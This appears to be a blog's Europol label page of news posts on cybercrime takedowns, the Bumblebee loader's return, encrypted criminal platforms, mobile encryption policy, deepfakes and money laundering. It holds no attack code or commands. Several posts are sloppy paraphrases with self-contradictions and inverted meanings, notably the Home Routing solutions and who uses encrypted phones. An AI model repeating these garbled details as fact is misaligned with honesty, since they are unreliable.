Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Europol. Show all posts
TrickBot
Bumblebee Cyberattack Cybersecurity Europol malware MSI Netskope phishing Ransomware TrickBot

Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

 

iThe Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zooom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.
Read more »
Platforms
Cyber Security CyberCriminal Europol Ireland Cyber Security Online Crime Organized Crime Platforms

Global Taskforce Dismantles Encrypted Criminal Platform ‘Ghost,’ Leading to 51 Arrests

 

In a major breakthrough, Ireland’s police service, An Garda Síochána, collaborated with Europol and law enforcement from eight other countries to dismantle a sophisticated criminal platform known as ‘Ghost.’ This encrypted platform was widely used for large-scale drug trafficking, money laundering, and other serious criminal activities. So far, the coordinated operation has led to the arrest of 51 individuals, including 38 in Australia and 11 in Ireland, and is seen as a critical step toward disrupting international organized crime. 

Ghost’s advanced encryption capabilities allowed criminals to communicate without fear of detection, handling approximately 1,000 messages daily. It even featured self-destruct options to erase messages, offering a high level of secrecy for criminal enterprises. During the investigation, Irish authorities seized 42 encrypted devices and over €15 million worth of drugs, such as cocaine, cannabis, and heroin, linking the platform to at least four criminal gangs operating within Ireland. The platform’s dismantling is part of a more extensive, ongoing investigation into organized crime that relies on encrypted communication networks to conduct illegal operations. 

Europol’s executive director, Catherine De Bolle, emphasized the importance of international collaboration in this operation, noting that the joint effort from various countries was crucial in dismantling a system that many criminals considered impenetrable. She stated that such coordinated action demonstrates that law enforcement can penetrate even the most secure networks when they work together. This operation marks a significant achievement in disrupting illegal activities facilitated by encrypted platforms, proving that even the most advanced criminal networks cannot hide from justice. 

Despite this victory, authorities remain cautious, acknowledging that shutting down criminal platforms like Ghost is just one step in the fight against organized crime. Similar cases, such as the resurgence of the LockBit ransomware gang, serve as reminders that criminals often adapt quickly, finding new ways to operate. This operation, however, is a testament to the effectiveness of global cooperation and advanced investigative techniques, sending a strong message to criminal networks that no platform, regardless of its sophistication, is beyond the reach of law enforcement. 

As investigations continue, Europol anticipates more arrests and the unearthing of additional criminal activities associated with Ghost. This case highlights the ongoing need for international collaboration, technological expertise, and persistent efforts to dismantle organized crime networks.
Read more »
Mobile Encryption
Cyber Security Cyberattacks CyberCrime cybercriminals CyberThreat Europol Mobile Encryption

Mobile Encryption Innovation Aids Criminals, Europol Reports

 


Europol has proposed solutions to address some of the challenges posed by privacy-enhancing technologies found in Home Routing, which pose a challenge for law enforcement agencies in intercepting communications during criminal investigations as a result of these technologies. There was a previous report by the agency in its Digital Challenges series in which it discussed the difficulty of gathering admissible evidence during investigations due to end-to-end encryption on communication platforms. 

This is the name given to an in-home routing system used by telecommunications companies to allow customers to send traffic to their home network, from calls, messages, and internet data, even when they are away from home. In a new report that was published by the EU Innovation Hub for Internal Security, it was examined how users can uphold citizens' privacy while simultaneously facilitating criminal investigations and prosecutions. 

There is no doubt that encryption is one of the most important means by which private communications may be protected. Meanwhile, it is also conducive to allowing threat actors to always remain hidden from the eyes of law enforcement to carry out their malicious activities. Companies must understand the needs, challenges, and priorities of their stakeholders within the Justice and Home Affairs (JHA) community to take the necessary measures to preserve the fundamental rights of the citizens of Europe while maintaining a safe environment. 

The privacy-enhancing technologies (PETs) that can be applied in Home Routing support data encryption at the service level, and the devices that are subscribed in the home network exchange session-based keys with the provider. In the case of the home network provider using PET technology, all traffic remains encrypted, as the key is inaccessible to both the home network's backend and the visiting network, which serves as a forwarder. It is due to this setup that authorities are prevented from obtaining evidence through the use of local Internet service providers (ISPs) as part of lawful interception activities. 

It explains that by implementing Home Routing, any suspect using a foreign SIM card cannot be intercepted after that device is deployed, says the European agency in a press release. If this is the case, then it may be necessary for police forces to rely on the cooperation of foreign service providers or issue a European Investigation Order (EIO), which can take significantly longer than it would normally take to complete an investigation, especially in cases where emergency interceptions are required; for example, replying to an EIO can take up to four months in most cases. 

There is no doubt that criminals are aware of this loophole in the law and are exploiting it to avoid being caught by law enforcement in their respective countries, as summarized by the European agency. The European Union's law enforcement agency Europol is appealing to stakeholders to consider two possible solutions that would effectively eliminate delays and procedural frictions associated with lawful communication interceptions. 

One of the first variants being considered is the enforcement of a regulation in the European Union that disables PE in the home routing protocol. It will be possible for domestic service providers to intercept calls made by individuals who are using foreign SIM cards but they will not have to share information about the person of interest with outside parties. A spokesperson for the agency said that by using this solution, both roaming subscribers, as well as subscribers in their local area, will be able to take advantage of the same level of encryption as communication through their national SIM card. 

However, subscribers abroad do not benefit from the added encryption of their home country, which is included in the subscription package. Furthermore, there is a second proposal where companies propose implementing a cross-border mechanism that allows law enforcement agencies within the European Union to issue interception requests that are promptly handled by the service providers to assist law enforcement agencies. Europol has identified two potential solutions to address the challenges posed by Home Routing and mobile encryption in criminal investigations. 

The first solution allows Privacy-Enhancing Technologies (PET) to be enabled for all users. However, this could result in a service provider in another EU member state learning about individuals of interest in an investigation, which may not be desirable. The second proposed solution involves establishing a mechanism for rapidly processing interception requests from service providers in other EU member states. Europol emphasizes that these two solutions are merely possible avenues for safeguarding and maintaining existing investigatory powers. 

The agency's goal is to highlight the impact that Home Routing encryption has on investigations, urging national authorities, legislatures, and telecommunications service providers to collaborate in finding a viable solution to this problem.
Read more »
Web Portal Breach
Data Breach EPE Portal Europol User Training Web Portal Breach

Europol Confirms Web Portal Breach: No Operational Data Stolen

Europol Confirms Web Portal Breach: No Operational Data Stolen

In a recent incident, Europol’s Europol Platform for Experts (EPE) portal experienced a security breach. The breach occurred within a closed user group, raising concerns about data security and operational integrity. In this blog post, we delve into the details of the breach, Europol’s response, and the implications for law enforcement agencies. 

The breach 

On September 6, 2023, Europol confirmed that its EPE portal had been compromised. However, the good news is that no operational data was stolen. The breach was limited to a specific user group, and Europol assured the public that core systems remained unaffected. This incident highlights the importance of robust security measures, even within restricted environments. 

EPE portal overview

The Europol Platform for Experts serves as a collaborative hub for law enforcement agencies, allowing experts to share information, collaborate on cases, and access relevant resources. It plays a crucial role in combating transnational crime, terrorism, and cyber threats. Given its sensitive nature, any breach raises concerns about the security of shared data and the potential impact on ongoing investigations. 

Europol’s response

Europol promptly detected the breach and took immediate action. While the compromised user group faced unauthorized access, Europol’s cybersecurity team swiftly contained the incident. The agency’s transparency in acknowledging the breach and providing timely updates demonstrates its commitment to maintaining public trust. 

What have we learned? 

  • Segmentation Matters: The breach’s limited scope underscores the importance of network segmentation. By isolating user groups, organizations can minimize the impact of security incidents. 
  • Continuous Monitoring: Regular security audits and monitoring are essential. Europol’s vigilance allowed them to detect the breach promptly. 
  • User Training: Educating users about security best practices is crucial. Even within closed groups, human error can lead to vulnerabilities.

Read more »
Policy
Cyber Crime Cyber Safety Cyberattacks Cybersecurity Cyberthreats Data Safety Europol Policy

Cracking Down on Crime: Europol Shares Data on Europe's Top Threats

 


There has been a considerable increase in serious organized crime over the past few years, and it continues to pose a significant threat to the EU's internal security. The most threatening criminal networks operating in and affecting the EU need to be clearly understood by law enforcement and policymakers if they are to effectively prioritise resources and guide policy action. 

Certain traits make successful companies agile and resilient, able to anticipate trends and pivot to new environments rapidly while maintaining their operations at the same time. Europol released a report on Friday that indicated that the most threatening criminal networks across the EU are also equipped with these skills. 

Europol has presented a report today (April 5) detailing the state of crime in Europe, highlighting 821 criminal networks that exist within the EU territory, flagged as the most dangerous criminal networks within the EU. Making the invisible visible so that we can know, fight, and defeat it. To produce the report, we consulted with law enforcement agencies from 27 of the member countries, as well as 17 other states, who provided information and participation. 

As Europol pointed out, some key characteristics distinguish the 821 most threatening criminal networks: they are agile as they can adopt business processes in a short time, which is characteristic of economies of scale, overcoming challenges that law enforcement agents may face as well. 

Despite their activities remaining concentrated in a single country, criminal networks are borderless: they can operate within EU and non-EU countries without any significant difficulty. Controlling: They can perform excellent surveillance over everything within the organization, and they generally specialize in a specific criminal activity. In addition to corrupt activities, the 821 networks also engage in significant damage to internal security due to corruption. 

As a result of Europol's report on terrorism, 50 per cent of the most dangerous criminal networks are involved in drug trafficking. For 36 per cent of those networks, drug trafficking is their sole business. A total of 15 percent of the organizations deal with fraud exclusively while the remaining 6 percent deal with human trafficking. 

Regarding drugs, aside from heroin, cannabis, and cocaine, there is also the concern that there is the arrival of new substances on the European market such as Fentanyl, which has already caused thousands of deaths in the United States and has already reached a critical point. Recent months have seen massive shipments of drugs hidden in bananas that have been shipped throughout Europe. 

A shipment of bananas in the British Isles contained a shipment of more than 12,500 pounds of cocaine, which was found in February, breaking the record of the most drugs seized in a single seizure in British history. In August of last year, customs agents in the Netherlands discovered that 17,600 pounds of cocaine had been hidden inside banana crates inside Rotterdam's port. 

In the Italian port of Gioia Tauro, a police dog sniffed out 3 tons of cocaine hidden in a case of bananas three months earlier. As part of the top ten criminal groups identified, nine of them specialize in cyber crimes and are actively operating in France, Germany, Switzerland and the U.S. These organizations, mainly run by Russians and Ukrainians, are active in France, Germany, Switzerland and the U.S. 

They have up to 100 members, but have a core of criminals who are responsible for distributing ransomware to affiliates so that they can conduct cyber attacks. A core group of individuals are responsible for managing the negotiation and payment of ransoms, often in cryptocurrency, and usually pay affiliates 80% of their fee for carrying out an attack. 

As a result of their involvement in fraud schemes and providing cyber services and technology solutions, service providers provide crucial support to criminal networks. The methods used in these campaigns include mass mailings and phishing campaigns, creating fake websites, creating fake advertisements and creating social media accounts. 

According to Europol, the firm has also been supporting online fraud schemes and advising on the movements of cryptocurrencies online. Law enforcement personnel sometimes use countermeasures, such as encrypted telephones to avoid detection by criminal networks, to avoid being detected by them. The other group of people avoid the use of electronic devices in all forms of communication and meet in person instead to avoid leaving any digital footprint on their activities.  

A report released by the European Commission stated that drug trafficking continues to stand out as the most significant activity in the EU countries and is witnessing record seizures of cocaine in Europe, as well as an increase in violent crimes linked to drugs, such as in Belgium and France.  

Half of the most dangerous networks in the criminal world are involved in drug trafficking in some form or another, whether on their own or as part of their overall portfolio. According to the report, more than 70% of networks engage in corruption “to facilitate criminal activity or obstruct law enforcement or judicial processes. 68% of networks use violence as an inherent element of their approach to conduct business,” which is consistent with their criminal or nefarious activities.

It has been reported that gang violence has been rife in Antwerp for decades as the city serves as the main entry point for Latin American cocaine cartels into the European continent. Federal authorities say that drug trafficking is rapidly affecting society as a result of an increase in drug use throughout the whole country. 

In Ylva Johansson, EU Commissioner for Home Affairs, the threat of organised crime is one of the biggest threats facing the society of today, a threat which threatens it with corruption and extreme violence. During a press conference, Europol explained the data it collected would be shared with law enforcement agencies in countries of the EU, which should help better target criminals.
Read more »
sensitive files
confidential documents Data Breach Data protection data security European Union Europol Investigation Law Enforcement Personal Information Security Breach sensitive files

Sensitive Documents Vanish Under Mysterious Circumstances from Europol Headquarters

 

A significant security breach has impacted the European Union's law enforcement agency, Europol, according to a report by Politico. Last summer, a collection of highly confidential documents containing personal information about prominent Europol figures vanished under mysterious circumstances.

The missing files, which included sensitive data concerning top law enforcement officials such as Europol Executive Director Catherine De Bolle, were stored securely at Europol's headquarters in The Hague. An ongoing investigation was launched by European authorities following the discovery of the breach.

An internal communication dated September 18, revealed that Europol's management was alerted to the disappearance of personal paper files belonging to several staff members on September 6, 2023. Subsequent checks uncovered additional missing files, prompting serious concerns regarding data security and privacy.

Europol took immediate steps to notify the individuals affected by the breach, as well as the European Data Protection Supervisor (EDPS). The incident poses significant risks not only to the individuals whose information was compromised but also to the agency's operations and ongoing investigations.

Adding to the gravity of the situation, Politico's report highlighted the unsettling discovery of some of the missing files by a member of the public in a public location in The Hague. However, key details surrounding the duration of the files' absence and the cause of the breach remain unclear.

Among the missing files were those belonging to Europol's top executives, including Catherine De Bolle and three deputy directors. These files contained a wealth of sensitive information, including human resources data.

In response to the breach, Europol took action against the agency's head of Human Resources, Massimiliano Bettin, placing him on administrative leave. Politico suggests that internal conflicts within the agency may have motivated the breach, speculating on potential motives for targeting Bettin specifically.

The security breach at Europol raises serious concerns about data protection and organizational security measures within the agency, prompting an urgent need for further investigation and safeguards to prevent future incidents.
Read more »
Ukraine Organization
Cyber Security Data Extortion Encryption EU EU Regulators European Union Europol Geopolitical Malicious actor Ransomware Attacks. Ransomware Gang Ukraine Organization

Europol Dismantles Ukrainian Ransomware Gang

A well-known ransomware organization operating in Ukraine has been successfully taken down by an international team under the direction of Europol, marking a major win against cybercrime. In this operation, the criminal group behind several high-profile attacks was the target of multiple raids.

The joint effort, which included law enforcement agencies from various countries, highlights the growing need for global cooperation in combating cyber threats. The dismantled group had been a prominent player in the world of ransomware, utilizing sophisticated techniques to extort individuals and organizations.

The operation comes at a crucial time, with Ukraine already facing challenges due to ongoing geopolitical tensions. Europol's involvement underscores the commitment of the international community to address cyber threats regardless of the geopolitical landscape.

One of the key events leading to the takedown was a series of coordinated raids across Ukraine. These actions, supported by Europol, aimed at disrupting the ransomware gang's infrastructure and apprehending key individuals involved in the criminal activities. The raids not only targeted the group's operational base but also sought to gather crucial evidence for further investigations.

Europol, in a statement, emphasized the significance of international collaboration in combating cybercrime. "This successful operation demonstrates the power of coordinated efforts in tackling transnational threats. Cybercriminals operate globally, and law enforcement must respond with a united front," stated the Europol representative.

The dismantled ransomware gang was reportedly using the Lockergoga ransomware variant, known for its sophisticated encryption methods and targeted attacks on high-profile victims. The group's activities had raised concerns globally, making its takedown a priority for law enforcement agencies.

In the aftermath of the operation, cybersecurity experts are optimistic about the potential impact on reducing ransomware threats. However, they also stress the importance of continued vigilance and collaboration to stay ahead of evolving cyber threats.

As the international community celebrates this successful operation, it serves as a reminder of the ongoing battle against cybercrime. The events leading to the dismantlement of the Ukrainian-based ransomware gang underscore the necessity for countries to pool their resources and expertise to protect individuals, businesses, and critical infrastructure from the ever-evolving landscape of cyber threats.

Read more »
Software
antivirus software Cyber Security Dark Web Europol Extortion Malicious actor NCA Ragnar Locker Ransomware Group Ransomware Attacks. Software

Group Behind Ragnar Locker Ransomware Debunked

International law enforcement organizations have effectively dismantled the renowned Ragnar Locker ransomware gang, marking a huge win against cybercrime. This operation shows the value of international cooperation in the fight against digital criminal businesses and represents a turning point in the ongoing war against cyber threats.

The Ragnar Locker gang had been a formidable force in the realm of cyber extortion, targeting businesses worldwide with their sophisticated ransomware attacks. Their modus operandi involved encrypting sensitive data and demanding hefty ransoms for its release, often crippling the operations of affected organizations. 

The takedown operation was a joint effort between various agencies, including the European Union Agency for Law Enforcement Cooperation (Europol), the Federal Bureau of Investigation (FBI), and the UK's National Crime Agency (NCA). It was a testament to the power of international cooperation in combating cybercrime.

Europol, in a statement, emphasized the significance of this operation, stating, "The arrest of the alleged leader and the seizure of the infrastructure used by the group to conduct its malicious activities is a clear signal that Europol and its partners are actively targeting ransomware groups, their infrastructure, and the financial proceeds they extract from their victims."

One of the key achievements of this operation was the seizure of the Ragnar Locker gang's dark web portal, where they conducted their extortion activities. This move has disrupted their ability to continue their illegal operations and sends a powerful message to other cybercriminals.

The impact of this takedown is expected to be far-reaching. With the dismantling of Ragnar Locker's infrastructure, countless potential victims have been spared from falling prey to their malicious activities. This operation serves as a stark reminder to cybercriminals that the global community is united in its determination to combat cyber threats.

However, it is crucial to remain vigilant in the face of evolving cyber threats. As the digital landscape continues to evolve, criminals may adapt their tactics. Organizations and individuals alike must prioritize cybersecurity measures, including robust antivirus software, regular backups, and employee training to recognize and respond to potential threats.

An important step forward in the battle against cybercrime was made with the successful operation against the Ragnar Locker ransomware organization. It demonstrates the value of global cooperation and makes it quite obvious that cybercriminals will be hunted down and made to answer for their deeds. While this win deserves praise, it also highlights the necessity of ongoing watchfulness and investment in cybersecurity measures to guard against potential attacks.


Read more »
Ransomware Gangs
cryptocurrency scammers Cyber Crime Europol Financial crime report fintech advancements Money Laundering neo banks online banking fraud organized crime networks Ransomware Gangs

Europol Warns of a Potent Criminal Economy Fostered by New Technological Tools

 

Europol's inaugural report on financial and economic crime highlights the alarming extent to which money laundering techniques employed by ransomware groups and cryptocurrency scammers are now cleaning the cash of nearly 70% of the world's organized crime networks. 

Despite concerted efforts by international law enforcement agencies to combat cybercrime, progress has been sluggish, resulting in European criminals reaping profits of up to €188 billion.

The report underscores how advancements in fintech are exacerbating financial malfeasance. The widespread adoption of online banking and digital-only 'neo banks' has led to disproportionately high rates of financial fraud and money laundering. Innovations like virtual international bank account numbers (IBAN) and 'buy now pay later' financing have further fueled online fraud.

Europol also points out that encrypted messaging apps, dark web marketplaces, cryptocurrencies, and other privacy-enhancing technologies shield criminals' identities, presenting significant challenges for law enforcement agencies. Criminals can now easily access illicit digital products and technical services, even without advanced technological skills, thanks to a burgeoning "crime-as-a-service" model.

The report highlights how money laundering has become increasingly streamlined with the emergence of new types of digital assets. Professional money launderers have established a parallel underground financial system that processes transactions away from the watchful eye of legal financial mechanisms. 

High-level money brokers play a pivotal role in this criminal ecosystem, providing a range of unregulated global banking and escrow services to numerous criminal organizations. This facilitates the laundering of billions of euros worth of illicit profits annually through the EU, rendering money laundering a significant criminal threat.

Europol underscores that most countries lack the requisite experience and specialized expertise needed for tracing cash, analyzing blockchain data, establishing actual ownership, managing seized assets, and facilitating recovery. Digital assets held outside of financial institutions pose an even greater challenge in terms of tracing, seizure, and confiscation.

“Organised crime has built a parallel global criminal economy around money laundering, illicit financial transfers and corruption,” explained Europol’s executive director, Catherine De Bolle. “With modern technology, they have diversified their modi operandi to evade detection.”
Read more »
Ukrainian Cyber Security
Call Center Scam cryptocurrency Cyber Crime Cyber police unit European law enforcement Europol Phishing Attacks Ukraine Ukrainian Cyber Security

Ukrainian Police Arrests Suspects Accused of Stealing $4.3M From Victims Across Europe


The Ukrainian police have detained 10 suspects, arresting two for allegedly being involved in a cybercrime group that conducted phishing campaigns and was a part of fraudulent online marketplaces, stealing more than $4.3 million from over 1,000 users across Europe. 

According to Ukraine’s cyber police unit, which collaborated with Czech Republic law enforcement on the bust, the threat group created more than 100 phishing sites to acquire victims’ bank credentials and access to their accounts. 

These websites provided a range of products for sale at discounts from market value. But, instead of obtaining a good price when customers entered their bank card information to pay for the fraudulent products, they had their account information stolen and probably had all of their money stolen from them. 

Additionally, the scammers established two Ukrainian call centers, in Vinnytsia and Lviv, and employed operators to persuade clients to make purchases as part of the scam. Too bad they were not assisting to defend their country instead of taking advantage of people. As per the police report, the victims include individuals from several European countries like the Czech Republic, France, Spain, and Portugal. The threat group scammed the victims of 160 million hryvnias or more, i.e. nearly $4.36 million. 

Following the event of the arrest, the Ukrainian police also shared a video where the police officers were seen busting down doors of a suspect’s residence and an empty call center. 

The law enforcement teams searched the houses, cars, and two call centers of the accused in a total of around 30 searches, seizing mobile phones, SIM cards, and computer hardware involved in illicit activity. 

The two suspected heads of the crime gang are facing up to 12 years in prison on charges of fraud and establishing a criminal organization. The European Union has captured ten more accused gang members, and according to international law enforcement organizations, the investigation is still underway. 

The aforementioned arrest is followed by another call center scan in Europe, that was announced by Europol in January this year. In the case, the European police detained 15 suspects and closed down a multi-country channel of call centers selling fabricated cryptocurrency that the law enforcement claimed to have stolen more than hundreds of million euros from victims.  

Read more »
Russian intelligence
APT28 ChipMixer cryptocurrency cryptomixer Cyber Fraud Europol FBI German Police Homeland Securities Investigation Identity Theft Money Laundering Russian intelligence

ChipMixer: Cryptocurrency Mixer Taken Down After ‘Laundering $3bn in Cryptocurrency’


Darknet cryptocurrency mixer, ChipMixer has been shut down as a result of a sting conducted by Europol, the FBI, and German police, which investigated servers, and internet domains and seized $46 million worth of cryptocurrency. 

During the raid, it was discovered that wallets connected to North Korean cybercriminals and Russian intelligence services had evidence of digital currencies. 

The US criminal prosecutors have booked a Vietnamese man they claim to have run the service since its August 2017 creation. Potentially contaminated funds are gathered by mixers and sent at random to destination wallets. 

Minh Quoc Nguyen, 49, of Hanoi has been accused of money laundering, operating an unlicensed money-transmitting business, and identity theft. The FBI has included him on the wanted criminal list. 

Criminals laundering more than $700 million in bitcoin from wallets identified as stolen funds, including money taken by North Korean hackers from Axie Infinity's Ronin Bridge and Harmony's Horizon Bridge, were among the service's customers. 

It has also been reported that APT28, the Russian military intelligence, and Fancy Bear also utilized ChipMixer in order to buy infrastructure used from Kremlin Drovorub malware. Moreover, according to Europol, the Russian RaaS group LockBit was also a patron. 

ChipMixer joins a relatively small group of crypto mixers that have been shut down or approved, enabling criminals to conceal the source of the cryptocurrency obtained illegally. The list presently includes Blender.io, which was probably renamed and relaunched as Sinbad, and Tornado Cash, a favorite of cybercriminals that helped hackers launder more than $7 billion between 2019 and 2022. 

The Federal Criminal Police Office of Germany seized two ChipMixer back-end servers and more than $46 million in cryptocurrencies, while American investigators seized two web domains that pointed to the company. 

According to court documents, ChipMixer has enabled customers to deposit Bitcoin, which would then be mixed with other users’ Bitcoin in order to anonymize the currency. 

Court records state that ChipMixer allowed users to deposit Bitcoin, which was then combined with Bitcoin from other users to make the currency anonymous. But, this mixer took things a step further by converting the deposited money into tiny tokens with an equal value called "chips," which were then combined, further anonymizing the currencies and obscuring the blockchain trails of the funds. This feature of the platform is what attracted so many criminals. 

The domain now displays a seizure notice, stating: “This domain has been seized by the FBI in accordance with a seizure warrant.” 

“Together, with our international partners, we are firmly committed to identifying and investigating cybercriminals who pose a serious threat to our economic security by laundering billions of dollars’ worth of cryptocurrency under the misguided anonymity of the darknet,” adds Scott Brown, special agent in charge of Homeland Securities Investigations (HSI) Arizona.  

Read more »
User Privacy
Cyber Crime DDOS Attacks EU Europol Phishing Attacks User Privacy

DDoS-for-Hire Websites are Seized by Authorities

 

According to Europol, international police deactivated roughly 50 well-known websites that charged users to perform distributed denial-of-service attacks and detained seven people who were allegedly the sites' administrators.

Operation Power Off was a coordinated effort by law enforcement agencies in the US, the Uk, the Netherlands, Poland, and Germany to combat attacks that have the potential to shut down the internet.

According to the police, the defendants misrepresented their websites as being services that could be employed for network testing while actually charging users for DDoS assaults against universities, government organizations, gaming platforms, and millions of people both domestically and overseas. Websites are rendered unavailable by DDoS attacks, which function by flooding them with unwanted traffic.

"These DDoS-for-hire websites, with paying customers both inside and outside the US, enabled network outages on a massive scale, targeting millions of victim computers around the world," said Antony Jung, special agent in charge of the operation at the FBI's field office in Anchorage, Alaska. Before purchasing or offering these illicit services, prospective users and administrators should exercise caution.

The largest DDoS-for-hire services are available on these sites, according to the UK's National Crime Agency (NCA), one of which has been used to launch more than 30 million attacks in its existence. Additionally, it has taken possession of customer data and, pending examination, may soon take legal action against UK site visitors.

DDoS Attack Is Illegal

DDoS poses the risk of lowering the barrier to entry for cybercrime. As per Europol, anyone with no technical expertise can start DDoS attacks with the press of a button for as little as $10, taking down entire networks and websites.

The harm they can cause to victims can be severe, financially crushing businesses and stripping people of necessary services provided by banks, governmental agencies, and law enforcement. Many young IT enthusiasts participate in this allegedly low-level crime feeling motivated by their imagined anonymity, unaware of the potential repercussions of such online activity.

The police take DDoS attacks seriously. Irrespective of their size, all users are monitored by law authorities, whether they are high-level hackers launching DDoS assaults against for-profit targets or casual users kicking their rivals out of video games.


Read more »
Misinformation
Cyber Security Europol Fake Documents Malicious actor McAfee Misinformation

According to Europol, Deepfakes are Used Frequently in Organized Crime

 

The Europol Innovation Lab recently released its inaugural report, titled "Facing reality? Law enforcement and the challenge of deepfakes", as part of its Observatory function. The paper presents a full overview of the illegal use of deepfake technology, as well as the obstacles faced by law enforcement in identifying and preventing the malicious use of deepfakes, based on significant desk research and in-depth interaction with law enforcement specialists. 

Deepfakes are audio and audio-visual consents that "convincingly show individuals expressing or doing activities they never did, or build personalities which never existed in the first place" using artificial intelligence. Deepfakes are being utilized for malevolent purposes in three important areas, according to the study: disinformation, non-consensual obscenity, and document fraud. As technology further advances in the near future, it is predicted such attacks would become more realistic and dangerous.

  1. Disinformation: Europol provided several examples of how deepfakes could be used to distribute false information, with potentially disastrous results. In the geopolitical domain, for example, producing a phony emergency warning that warns of an oncoming attack. The US charged the Kremlin with a disinformation scheme to use as a pretext for an invasion of Ukraine in February, just before the crisis between Russia and Ukraine erupted.  The technique may also be used to attack corporations, for example, by constructing a video or audio deepfake which makes it appear as if a company's leader committed contentious or unlawful conduct. Criminals imitating the voice of the top executive of an energy firm robbed the company of $243,000. 
  2. Non-consensual obscenity: According to the analysis, Sensity found non-consensual obscenity was present in 96 percent of phony videos. This usually entails superimposing a victim's face onto the body of a philanderer, giving the impression of the victim is performing the act.
  3. Document fraud: While current fraud protection techniques are making it more difficult to fake passports, the survey stated that "synthetic media and digitally modified facial photos present a new way for document fraud." These technologies, for example, can mix or morph the faces of the person who owns the passport and the person who wants to obtain one illegally, boosting the likelihood the photo will pass screening, including automatic ones. 

Deepfakes might also harm the court system, according to the paper, by artificially manipulating or producing media to show or deny someone's guilt. In a recent child custody dispute, a mother of a kid edited an audiotape of her husband to persuade the court he was abusive to her. 

Europol stated all law enforcement organizations must acquire new skills and tools to properly deal with these types of threats. Manual detection strategies, such as looking for discrepancies, and automatic detection techniques, such as deepfake detection software uses artificial intelligence and is being developed by companies like Facebook and McAfee, are among them. 

It is quite conceivable that malicious threat actors would employ deepfake technology to assist various criminal crimes and undertake misinformation campaigns to influence or corrupt public opinion in the months and years ahead. Machine learning and artificial intelligence advancements will continue to improve the software used to make deepfakes.
Read more »
Migrant Smugglers
Cyber Crime Dark Web Europol Fake Documents Migrant Smugglers

Europol Dismantles Criminal Network Distributing Forged EU Travel Documents on Dark Web

 

The Spanish National Police and the French Border Police, in a joint operation coordinated by Europol, have busted an organized cybercrime gang involved in the procurement and distribution of forged travel and ID documents for migrant smugglers. 

During the raids, in which three house searches were carried out and a total of 17 people were arrested, police seized computers, smartphones, storage devices, counterfeit and genuine ID documents and photocopies of ID documents, labor certificates, administrative documents, payment cards, and cash. 

According to a press release published by European Union’s law enforcement agency, the organized cybercrime gang network distributed forged ID and travel documents in France, Germany, Italy, and Spain. 

“The documents were used by other criminals involved in the smuggling of migrants to the US, the UK and Ireland and other criminal activities (such as property crimes, trafficking in human beings, drug trafficking),” the statement of Europol reads. The criminal network was directly involved in migrant smuggling activities and logistical arrangements in return for payments starting at €8000 ($9000) per person.” 

The members of the criminal gang, mainly originating from Eastern European countries, apparently also operated in Georgia and Lithuania. According to Europol, cybercriminals mainly used dark web channels to distribute forged documents, including residence permits, vehicle registration documents, driver’s licenses, and travel documents focusing on French, Romanian, Georgian, Lithuanian, and Polish IDs. 

Additionally, the suspects used instant messaging apps and postal services to send the documents to their intended recipients. Messaging apps, presumably encrypted ones, were used by the group to collaborate and exchange images of documents, vehicles, and money transfer slips. Europol analysts said they linked some of this information to other ongoing investigations. 

Last year witnessed a gradual shift in the methodology employed by migrant smugglers in the trafficking of human beings. Digital technology is playing a major role in the operations of migrant smugglers and they have expanded their use of social media platforms and mobile applications in order to offer their illegal services.  

Human traffickers have exploited the anonymity of the internet environment to target vulnerable individuals and then exploit them via both escort websites and even dating platforms. To counter this new threat, Europol signed a working agreement with the UK’s National Crime Agency (NCA) designed to formalize cooperation on this and other serious and organized crimes.
Read more »
VPN
Customer Data Cyber Crime cybercriminals Europol VPN

VPNLab.net Service was Seized Because it was Used by Criminals to Spread Ransomware

 

Following a coordinated worldwide police investigation, a VPN service used by criminals to spread ransomware, malware, and facilitate other forms of cybercrime has been knocked offline. The 15 servers used by the VPNLab.net service have been seized or disrupted as part of a combined operation by Europol, Germany's Hanover Police Department, the FBI, the UK's National Crime Agency (NCA), and others. 

According to Europol, VPNLab.net was founded in 2008 and provides services based on OpenVPN technology and 2048-bit encryption to give online anonymity for as little as $60 per year. The service also offered a double VPN, with servers located in a variety of countries. "This made VPNLab.net a popular choice for cybercriminals, who could use its services to carry on committing their crimes without fear of detection by authorities," the agency said. 

According to Europol, several investigations have revealed criminals using the VPNLab.net service to enable illegal operations such as virus dissemination. Other incidents demonstrated the service's usage in the setup of infrastructure and communications for ransomware operations, as well as the actual deployment of malware. Cybercriminals also utilized the site to spread malware while evading authorities — but now that the servers have been seized, law enforcement is reviewing customer data in an attempt to identify cybercriminals and victims of cyberattacks.

The vpnlab.net domain presently shows a warning telling visitors that the domain has been seized by legal enforcement. According to the statement, authorities obtained consumer data held on confiscated servers, and an inquiry has been initiated. Europol has not revealed which types of malware and ransomware were distributed using the VPN provider. As a consequence of the investigation, more than 100 organizations have been identified as being vulnerable to cyberattacks, and law enforcement is collaborating with them to mitigate any possible compromise. 

"The actions carried out under this investigation make clear that criminals are running out of ways to hide their tracks online," said Edvardas Å ileris, head of Europol's European Cybercrime Centre (EC3). "Each investigation we undertake informs the next, and the information gained on potential victims means we may have pre-empted several serious cyberattacks and data breaches," he added. 

